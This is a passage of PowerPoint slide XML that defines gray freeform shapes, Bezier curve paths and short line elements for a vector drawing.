                      <a:cubicBezTo>
                        <a:pt x="337" y="205"/>
                        <a:pt x="0" y="509"/>
                        <a:pt x="3" y="775"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="779"/>
                        <a:pt x="1035" y="1052"/>
                        <a:pt x="1035" y="1052"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2887" y="1549"/>
                        <a:pt x="2887" y="1549"/>
                        <a:pt x="2887" y="1549"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2887" y="1549"/>
                        <a:pt x="2887" y="1549"/>
                        <a:pt x="2887" y="1549"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2887" y="1284"/>
                        <a:pt x="3167" y="971"/>
                        <a:pt x="3669" y="836"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3918" y="770"/>
                        <a:pt x="4158" y="759"/>
                        <a:pt x="4349" y="795"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="1744" y="10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97" name="Freeform 16630"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2523" y="1748"/>
                  <a:ext cx="324" cy="148"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 782 w 1855"/>
                    <a:gd name="T1" fmla="*/ 136 h 849"/>
                    <a:gd name="T2" fmla="*/ 0 w 1855"/>
                    <a:gd name="T3" fmla="*/ 849 h 849"/>
                    <a:gd name="T4" fmla="*/ 1855 w 1855"/>
                    <a:gd name="T5" fmla="*/ 352 h 849"/>
                    <a:gd name="T6" fmla="*/ 782 w 1855"/>
                    <a:gd name="T7" fmla="*/ 136 h 84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855"/>
                    <a:gd name="T13" fmla="*/ 0 h 849"/>
                    <a:gd name="T14" fmla="*/ 1855 w 1855"/>
                    <a:gd name="T15" fmla="*/ 849 h 84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855" h="849">
                      <a:moveTo>
                        <a:pt x="782" y="136"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="280" y="271"/>
                        <a:pt x="0" y="572"/>
                        <a:pt x="0" y="849"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1855" y="352"/>
                        <a:pt x="1855" y="352"/>
                        <a:pt x="1855" y="352"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1761" y="97"/>
                        <a:pt x="1291" y="0"/>
                        <a:pt x="782" y="136"/>
                      </a:cubicBezTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="969696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98" name="Freeform 16631"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2391" y="1725"/>
                  <a:ext cx="259" cy="135"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1488 w 1488"/>
                    <a:gd name="T1" fmla="*/ 30 h 773"/>
                    <a:gd name="T2" fmla="*/ 836 w 1488"/>
                    <a:gd name="T3" fmla="*/ 77 h 773"/>
                    <a:gd name="T4" fmla="*/ 0 w 1488"/>
                    <a:gd name="T5" fmla="*/ 773 h 773"/>
                    <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T9" fmla="*/ 0 w 1488"/>
                    <a:gd name="T10" fmla="*/ 0 h 773"/>
                    <a:gd name="T11" fmla="*/ 1488 w 1488"/>
                    <a:gd name="T12" fmla="*/ 773 h 77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488" h="773">
                      <a:moveTo>
                        <a:pt x="1488" y="30"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1302" y="0"/>
                        <a:pt x="1073" y="14"/>
                        <a:pt x="836" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="334" y="212"/>
                        <a:pt x="8" y="492"/>
                        <a:pt x="0" y="773"/>
                      </a:cubicBez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99" name="Freeform 16632"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2259" y="1690"/>
                  <a:ext cx="259" cy="136"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1483 w 1483"/>
                    <a:gd name="T1" fmla="*/ 29 h 777"/>
                    <a:gd name="T2" fmla="*/ 839 w 1483"/>
                    <a:gd name="T3" fmla="*/ 81 h 777"/>
                    <a:gd name="T4" fmla="*/ 3 w 1483"/>
                    <a:gd name="T5" fmla="*/ 777 h 777"/>
                    <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T9" fmla="*/ 0 w 1483"/>
                    <a:gd name="T10" fmla="*/ 0 h 777"/>
                    <a:gd name="T11" fmla="*/ 1483 w 1483"/>
                    <a:gd name="T12" fmla="*/ 777 h 77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483" h="777">
                      <a:moveTo>
                        <a:pt x="1483" y="29"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1298" y="0"/>
                        <a:pt x="1073" y="19"/>
                        <a:pt x="839" y="81"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="337" y="216"/>
                        <a:pt x="0" y="503"/>
                        <a:pt x="3" y="777"/>
                      </a:cubicBez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00" name="Freeform 16633"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2130" y="1656"/>
                  <a:ext cx="254" cy="135"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1456 w 1456"/>
                    <a:gd name="T1" fmla="*/ 23 h 771"/>
                    <a:gd name="T2" fmla="*/ 839 w 1456"/>
                    <a:gd name="T3" fmla="*/ 75 h 771"/>
                    <a:gd name="T4" fmla="*/ 2 w 1456"/>
                    <a:gd name="T5" fmla="*/ 771 h 771"/>
                    <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T9" fmla="*/ 0 w 1456"/>
                    <a:gd name="T10" fmla="*/ 0 h 771"/>
                    <a:gd name="T11" fmla="*/ 1456 w 1456"/>
                    <a:gd name="T12" fmla="*/ 771 h 77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456" h="771">
                      <a:moveTo>
                        <a:pt x="1456" y="23"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1276" y="0"/>
                        <a:pt x="1061" y="16"/>
                        <a:pt x="839" y="75"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="337" y="210"/>
                        <a:pt x="0" y="500"/>
                        <a:pt x="2" y="771"/>
                      </a:cubicBez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01" name="Freeform 16634"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2130" y="1917"/>
                  <a:ext cx="30" cy="85"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 414"/>
                    <a:gd name="T1" fmla="*/ 0 h 1137"/>
                    <a:gd name="T2" fmla="*/ 0 w 414"/>
                    <a:gd name="T3" fmla="*/ 1025 h 1137"/>
                    <a:gd name="T4" fmla="*/ 414 w 414"/>
                    <a:gd name="T5" fmla="*/ 1137 h 1137"/>
                    <a:gd name="T6" fmla="*/ 414 w 414"/>
                    <a:gd name="T7" fmla="*/ 111 h 1137"/>
                    <a:gd name="T8" fmla="*/ 0 w 414"/>
                    <a:gd name="T9" fmla="*/ 0 h 11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4"/>
                    <a:gd name="T16" fmla="*/ 0 h 1137"/>
                    <a:gd name="T17" fmla="*/ 414 w 414"/>
                    <a:gd name="T18" fmla="*/ 1137 h 11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4" h="1137">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="1025"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="414" y="1137"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="414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02" name="Freeform 16635"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2135" y="1923"/>
                  <a:ext cx="20" cy="73"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 281"/>
                    <a:gd name="T1" fmla="*/ 0 h 989"/>
                    <a:gd name="T2" fmla="*/ 0 w 281"/>
                    <a:gd name="T3" fmla="*/ 914 h 989"/>
                    <a:gd name="T4" fmla="*/ 281 w 281"/>
                    <a:gd name="T5" fmla="*/ 989 h 989"/>
                    <a:gd name="T6" fmla="*/ 281 w 281"/>
                    <a:gd name="T7" fmla="*/ 75 h 989"/>
                    <a:gd name="T8" fmla="*/ 0 w 281"/>
                    <a:gd name="T9" fmla="*/ 0 h 9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89"/>
                    <a:gd name="T17" fmla="*/ 281 w 281"/>
                    <a:gd name="T18" fmla="*/ 989 h 9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89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89"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="281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03" name="Freeform 16636"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2084" y="1905"/>
                  <a:ext cx="31" cy="84"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 413"/>
                    <a:gd name="T1" fmla="*/ 0 h 1138"/>
                    <a:gd name="T2" fmla="*/ 0 w 413"/>
                    <a:gd name="T3" fmla="*/ 1027 h 1138"/>
                    <a:gd name="T4" fmla="*/ 413 w 413"/>
                    <a:gd name="T5" fmla="*/ 1138 h 1138"/>
                    <a:gd name="T6" fmla="*/ 413 w 413"/>
                    <a:gd name="T7" fmla="*/ 111 h 1138"/>
                    <a:gd name="T8" fmla="*/ 0 w 413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8"/>
                    <a:gd name="T17" fmla="*/ 413 w 413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3" y="1138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Freeform 16637"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2089" y="1910"/>
                  <a:ext cx="21" cy="74"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 283"/>
                    <a:gd name="T1" fmla="*/ 0 h 990"/>
                    <a:gd name="T2" fmla="*/ 0 w 283"/>
                    <a:gd name="T3" fmla="*/ 914 h 990"/>
                    <a:gd name="T4" fmla="*/ 283 w 283"/>
                    <a:gd name="T5" fmla="*/ 990 h 990"/>
                    <a:gd name="T6" fmla="*/ 283 w 283"/>
                    <a:gd name="T7" fmla="*/ 76 h 990"/>
                    <a:gd name="T8" fmla="*/ 0 w 283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3"/>
                    <a:gd name="T16" fmla="*/ 0 h 990"/>
                    <a:gd name="T17" fmla="*/ 283 w 283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3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3" y="990"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283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05" name="Freeform 16638"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2221" y="1942"/>
                  <a:ext cx="31" cy="84"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 413"/>
                    <a:gd name="T1" fmla="*/ 0 h 1139"/>
                    <a:gd name="T2" fmla="*/ 0 w 413"/>
                    <a:gd name="T3" fmla="*/ 1028 h 1139"/>
                    <a:gd name="T4" fmla="*/ 413 w 413"/>
                    <a:gd name="T5" fmla="*/ 1139 h 1139"/>
                    <a:gd name="T6" fmla="*/ 413 w 413"/>
                    <a:gd name="T7" fmla="*/ 111 h 1139"/>
                    <a:gd name="T8" fmla="*/ 0 w 413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9"/>
                    <a:gd name="T17" fmla="*/ 413 w 413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3" y="1139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06" name="Freeform 16639"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2226" y="1947"/>
                  <a:ext cx="21" cy="74"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 283"/>
                    <a:gd name="T1" fmla="*/ 0 h 990"/>
                    <a:gd name="T2" fmla="*/ 0 w 283"/>
                    <a:gd name="T3" fmla="*/ 914 h 990"/>
                    <a:gd name="T4" fmla="*/ 283 w 283"/>
                    <a:gd name="T5" fmla="*/ 990 h 990"/>
                    <a:gd name="T6" fmla="*/ 283 w 283"/>
                    <a:gd name="T7" fmla="*/ 76 h 990"/>
                    <a:gd name="T8" fmla="*/ 0 w 283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3"/>
                    <a:gd name="T16" fmla="*/ 0 h 990"/>
                    <a:gd name="T17" fmla="*/ 283 w 283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3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3" y="990"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283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07" name="Freeform 16640"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2175" y="1930"/>
                  <a:ext cx="31" cy="84"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 414"/>
                    <a:gd name="T1" fmla="*/ 0 h 1138"/>
                    <a:gd name="T2" fmla="*/ 0 w 414"/>
                    <a:gd name="T3" fmla="*/ 1027 h 1138"/>
                    <a:gd name="T4" fmla="*/ 414 w 414"/>
                    <a:gd name="T5" fmla="*/ 1138 h 1138"/>
                    <a:gd name="T6" fmla="*/ 414 w 414"/>
                    <a:gd name="T7" fmla="*/ 111 h 1138"/>
                    <a:gd name="T8" fmla="*/ 0 w 414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4"/>
                    <a:gd name="T16" fmla="*/ 0 h 1138"/>
                    <a:gd name="T17" fmla="*/ 414 w 414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4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4" y="1138"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="414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08" name="Freeform 16641"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2180" y="1935"/>
                  <a:ext cx="21" cy="73"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 282"/>
                    <a:gd name="T1" fmla="*/ 0 h 990"/>
                    <a:gd name="T2" fmla="*/ 0 w 282"/>
                    <a:gd name="T3" fmla="*/ 914 h 990"/>
                    <a:gd name="T4" fmla="*/ 282 w 282"/>
                    <a:gd name="T5" fmla="*/ 990 h 990"/>
                    <a:gd name="T6" fmla="*/ 282 w 282"/>
                    <a:gd name="T7" fmla="*/ 75 h 990"/>
                    <a:gd name="T8" fmla="*/ 0 w 282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2"/>
                    <a:gd name="T16" fmla="*/ 0 h 990"/>
                    <a:gd name="T17" fmla="*/ 282 w 282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2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2" y="990"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="282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09" name="Freeform 16642"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2313" y="1966"/>
                  <a:ext cx="30" cy="85"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 413"/>
                    <a:gd name="T1" fmla="*/ 0 h 1138"/>
                    <a:gd name="T2" fmla="*/ 0 w 413"/>
                    <a:gd name="T3" fmla="*/ 1027 h 1138"/>
                    <a:gd name="T4" fmla="*/ 413 w 413"/>
                    <a:gd name="T5" fmla="*/ 1138 h 1138"/>
                    <a:gd name="T6" fmla="*/ 413 w 413"/>
                    <a:gd name="T7" fmla="*/ 111 h 1138"/>
                    <a:gd name="T8" fmla="*/ 0 w 413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8"/>
                    <a:gd name="T17" fmla="*/ 413 w 413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3" y="1138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0" name="Freeform 16643"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2317" y="1972"/>
                  <a:ext cx="21" cy="73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4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1" name="Freeform 16644"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2267" y="1954"/>
                  <a:ext cx="30" cy="84"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 413"/>
                    <a:gd name="T1" fmla="*/ 0 h 1139"/>
                    <a:gd name="T2" fmla="*/ 0 w 413"/>
                    <a:gd name="T3" fmla="*/ 1028 h 1139"/>
                    <a:gd name="T4" fmla="*/ 413 w 413"/>
                    <a:gd name="T5" fmla="*/ 1139 h 1139"/>
                    <a:gd name="T6" fmla="*/ 413 w 413"/>
                    <a:gd name="T7" fmla="*/ 111 h 1139"/>
                    <a:gd name="T8" fmla="*/ 0 w 413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9"/>
                    <a:gd name="T17" fmla="*/ 413 w 413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3" y="1139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2" name="Freeform 16645"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2272" y="1960"/>
                  <a:ext cx="20" cy="73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4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3" name="Freeform 16646"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2404" y="1991"/>
                  <a:ext cx="30" cy="84"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 413"/>
                    <a:gd name="T1" fmla="*/ 0 h 1138"/>
                    <a:gd name="T2" fmla="*/ 0 w 413"/>
                    <a:gd name="T3" fmla="*/ 1027 h 1138"/>
                    <a:gd name="T4" fmla="*/ 413 w 413"/>
                    <a:gd name="T5" fmla="*/ 1138 h 1138"/>
                    <a:gd name="T6" fmla="*/ 413 w 413"/>
                    <a:gd name="T7" fmla="*/ 111 h 1138"/>
                    <a:gd name="T8" fmla="*/ 0 w 413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8"/>
                    <a:gd name="T17" fmla="*/ 413 w 413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3" y="1138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4" name="Freeform 16647"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2409" y="1996"/>
                  <a:ext cx="20" cy="74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4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5" name="Freeform 16648"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2358" y="1979"/>
                  <a:ext cx="31" cy="84"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 414"/>
                    <a:gd name="T1" fmla="*/ 0 h 1137"/>
                    <a:gd name="T2" fmla="*/ 0 w 414"/>
                    <a:gd name="T3" fmla="*/ 1026 h 1137"/>
                    <a:gd name="T4" fmla="*/ 414 w 414"/>
                    <a:gd name="T5" fmla="*/ 1137 h 1137"/>
                    <a:gd name="T6" fmla="*/ 414 w 414"/>
                    <a:gd name="T7" fmla="*/ 111 h 1137"/>
                    <a:gd name="T8" fmla="*/ 0 w 414"/>
                    <a:gd name="T9" fmla="*/ 0 h 11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4"/>
                    <a:gd name="T16" fmla="*/ 0 h 1137"/>
                    <a:gd name="T17" fmla="*/ 414 w 414"/>
                    <a:gd name="T18" fmla="*/ 1137 h 11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4" h="1137">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="1026"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="414" y="1137"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="414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6" name="Freeform 16649"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2363" y="1984"/>
                  <a:ext cx="21" cy="74"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 281"/>
                    <a:gd name="T1" fmla="*/ 0 h 989"/>
                    <a:gd name="T2" fmla="*/ 0 w 281"/>
                    <a:gd name="T3" fmla="*/ 914 h 989"/>
                    <a:gd name="T4" fmla="*/ 281 w 281"/>
                    <a:gd name="T5" fmla="*/ 989 h 989"/>
                    <a:gd name="T6" fmla="*/ 281 w 281"/>
                    <a:gd name="T7" fmla="*/ 75 h 989"/>
                    <a:gd name="T8" fmla="*/ 0 w 281"/>
                    <a:gd name="T9" fmla="*/ 0 h 9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89"/>
                    <a:gd name="T17" fmla="*/ 281 w 281"/>
                    <a:gd name="T18" fmla="*/ 989 h 9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89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89"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="281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7" name="Line 16650"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2099" y="1913"/>
                  <a:ext cx="0" cy="68"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/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8" name="Line 16651"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2089" y="1943"/>
                  <a:ext cx="21" cy="5"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/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9" name="Line 16652"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2145" y="1926"/>
                  <a:ext cx="0" cy="67"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/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0" name="Line 16653"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2134" y="1955"/>
                  <a:ext cx="21" cy="6"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/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1" name="Line 16654"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2191" y="1938"/>
                  <a:ext cx="0" cy="68"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/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2" name="Line 16655"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2180" y="1968"/>
                  <a:ext cx="21" cy="6"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/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3" name="Line 16656"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2236" y="1950"/>
                  <a:ext cx="0" cy="68"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/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4" name="Line 16657"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2226" y="1980"/>
                  <a:ext cx="20" cy="5"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/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5" name="Line 16658"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2282" y="1963"/>
                  <a:ext cx="0" cy="67"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/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6" name="Line 16659"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2271" y="1992"/>
                  <a:ext cx="21" cy="6"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/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7" name="Line 16660"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2328" y="1975"/>
                  <a:ext cx="0" cy="67"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/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8" name="Line 16661"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2317" y="2005"/>
                  <a:ext cx="21" cy="5"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/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9" name="Line 16662"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2373" y="1987"/>
                  <a:ext cx="0" cy="68"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/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30" name="Line 16663"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2363" y="2017"/>
                  <a:ext cx="21" cy="5"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/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31" name="Line 16664"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2419" y="2000"/>
                  <a:ext cx="0" cy="67"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/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32" name="Line 16665"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2408" y="2029"/>
                  <a:ext cx="21" cy="6"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/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3" name="Group 14774"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3471" y="2299"/>
                <a:ext cx="468" cy="230"/>
                <a:chOff x="4094" y="2291"/>
                <a:chExt cx="1924" cy="951"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="614" name="Freeform 14775"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
